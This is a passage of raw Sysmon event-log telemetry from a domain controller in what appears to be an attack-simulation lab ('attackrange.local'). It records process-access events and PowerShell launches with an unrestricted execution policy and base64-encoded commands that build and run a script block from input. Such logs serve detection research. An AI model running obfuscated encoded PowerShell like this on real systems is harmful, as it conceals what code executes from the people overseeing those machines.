15:50:21.529{D28789B6-7C3D-5FA1-F902-000000008701}38444216C:\Windows\system32\conhost.exe{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000233Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000232Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000231Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000230Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000229Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000228Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000226Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000225Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.513{D28789B6-7C3D-5FA1-FB02-000000008701}3472584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+910d32ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90574177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90573e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+910254ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+905349de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90592ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90576512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90576512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+905763a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90568328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9057485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9057444e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90574177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+90573e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+910254ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9055aca9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+9055a279(wow64) 154100x8000000000000000222Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.526{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3D-5FA1-E3BE-100000000000}0x10bee30HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C3D-5FA1-FB02-000000008701}3472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000221Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.451{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C3D-5FA1-FB02-000000008701}3472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.451{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C3D-5FA1-FB02-000000008701}3472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000219Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.388{D28789B6-7C3D-5FA1-FB02-000000008701}3472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gk3dqwjq.llh.ps12020-11-03 15:50:21.388 10341000x8000000000000000218Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.372{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3D-5FA1-FB02-000000008701}3472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7C3D-5FA1-F902-000000008701}38444216C:\Windows\system32\conhost.exe{D28789B6-7C3D-5FA1-FB02-000000008701}3472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\Syst